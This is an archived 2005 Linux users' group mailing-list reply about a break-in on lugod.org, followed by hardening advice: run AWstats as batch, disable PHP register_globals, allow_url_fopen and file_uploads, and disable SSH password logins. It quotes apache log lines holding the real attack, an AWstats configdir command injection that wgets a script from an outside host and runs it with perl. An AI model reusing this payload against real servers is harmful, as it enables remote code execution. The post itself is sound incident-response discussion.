l i n u x - u s e r s - g r o u p - o f - d a v i s
Next Meeting:
July 7: Social gathering
Next Installfest:
Latest News:
Jun. 14: June LUGOD meeting cancelled
Page last updated:
2005 Feb 16 04:22

The following is an archive of a post made to our 'vox-tech mailing list' by one of its subscribers.

Report this post as spam:

(Enter your email address)
Re: [vox-tech] lugod.org cracked?
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [vox-tech] lugod.org cracked?

Quoting Rod Roark (rod@sunsetsystems.com):

> I think I found the point of entry.  From the lugod.org
> apache log:
> - - [14/Feb/2005:19:31:37 -0800] "POST /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec
> ho%20;echo| HTTP/1.0" 200 525 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
> - - [14/Feb/2005:19:31:37 -0800] "POST /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec
> ho%20;echo| HTTP/1.0" 200 525 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

Host linuxmafia.com was likewise cracked on January 31, 2005, exactly
the same way, by some kiddie connecting from Brazil.  (I had everything
rebuilt with no lossage in 22 hours, but it was annoying.)

Personally, if I ever reinstall AWstats, it'll be to run it in batch
fashion to generate static pages, _not_ as a CGI -- and it's generally
wise to be suspicious of programmers' ability and inclination to
validate their input-data streams on public-facing apps.  (Remember, any
CGI on a public Web server that accepts input via GET or PUT, including
URL strings submitted via Web browser, is inherently obliged to parse
input data from the public Internet.)

Other changes I made on my site:

1.  I discovered to my horror that, despite staying current on PHP4
upgrades, the horrifically unwise "register_globals = On" setting from
some ancient, long-vanished PHP4 package had been retained, and I'd
never been warned about that (or noticed it on my own).  That got turn
off (in /etc/php4/apache/php.ini), in a hurry.

2.  While I was at it, I gave similar treatment to the allow_url_fopen
and file_uploads booleans in the same file.

3.  Also, since trusting users to use decent SSH passwords makes me
nervous, I disabled password authentication.  Not that people's RSA/DSA
private keys and passphrases can't be stolen, but it's a little harder,
at least.

vox-tech mailing list

LUGOD Group on LinkedIn
Sign up for LUGOD event announcements
Your email address:
LUGOD Group on Facebook
'Like' LUGOD on Facebook:

Hosting provided by:
Sunset Systems
Sunset Systems offers preconfigured Linux systems, remote system administration and custom software development.

LUGOD: Linux Users' Group of Davis
PO Box 2082, Davis, CA 95617
Contact Us

LUGOD is a 501(c)7 non-profit organization
based in Davis, California
and serving the Sacramento area.
"Linux" is a trademark of Linus Torvalds.

Sponsored in part by:
Sunset Systems
Who graciously hosts our website & mailing lists!